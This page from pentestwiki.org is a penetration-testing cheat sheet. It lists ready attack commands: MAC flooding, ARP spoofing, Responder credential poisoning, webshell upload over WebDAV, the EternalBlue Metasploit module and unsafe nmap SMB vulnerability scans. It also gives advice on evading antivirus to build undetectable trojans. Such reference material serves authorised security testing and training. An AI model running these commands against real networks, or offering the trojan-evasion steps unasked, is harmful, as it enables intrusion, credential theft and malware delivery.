Exploitation

From pentestwiki.org

Physical access (LAN)

MAC flooding

root #macof -n 1000


MITM

root #arpspoof


root #ettercap


LLMNR poisoning

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

root #responder -I eth0 -rv


References:

Find exploits

In kali:

root #searchsploit <SERVICE NAME>


Google:

site:exploit-db.com APP VERSION
$linux-exploit-suggester.sh -k 2.6.9


C:>windows-exploit-suggester.py -i <systeminfo file>


$linuxprivchecker.py


NULL session

C:>net use \\$IP\ipc$ "" "/user:"


WebDAV

$cadaver http://$IP
dav:/> put webshell.aspx


Compilers

To crosscompile windows exploits in linux:

First install the package:

root #apt-get install mingw-w64


  • Command line for C:
$i686-w64-mingw32-gcc -lws2_32 -o 100 100.c


Useful flags:

-l ws2_32 -l mswsock
  • Command line for C++:
$i686-mingw32-g++ main.cpp -o main -static


py2exe http://www.py2exe.org/

bat2exe

Reversing in Linux

Tools:


egg-hunter

$/usr/share/metasploit-framework/tools/exploit/egghunter.rb -f python -e W00T


Buffer Overflow offsets:

$/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 256
$/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 256 -q 773870B4


Reversing in Windows

Tools:

  • IDA Pro
  • OllyDbg
  • Immunity Debugger
  • mona.py Corelan Repository for mona.py
  • API Monitor is a free software that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications

Fuzzing

Linux

  • sfuzz (kali)
  • radamsa
  • spike

Windows

AFL is a popular fuzzing tool for coverage-guided fuzzing. The tool combines fast target execution with clever heuristics to find new execution paths in the target binary. It has been successfully used to find a large number of vulnerabilities in real products.

AV Evasion

  • Veil: Encrypts/Encode/Obfuscate msfvenom-like payloads

Thanks @ReneFreingruber

To remove /var/lib/veil strings and make reverse engineering harder:

-gcflags=-trimpath=/var/lib/veil -asmflags=-trimpath=/var/lib/veil
  • bat2exe

Do a bat script with your trojan and use bat2exe to get an FUD to trojanize an exe or service. https://github.com/islamadel/bat2exe/blob/master/upload/bat2exe.exe

  • Phantom evasion

https://github.com/oddcod3/Phantom-Evasion Interacts with msfvenom.

SMB exploitation

Eternalblue (Target: Windows 7 and Server 2008 R2 (x64) All Service Packs):

msf>use exploit/windows/smb/ms17_010_eternalblue


$nmap -sS -T4 --open -p 139,445 --script=smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos --script-args=unsafe=1 $IP/24


References: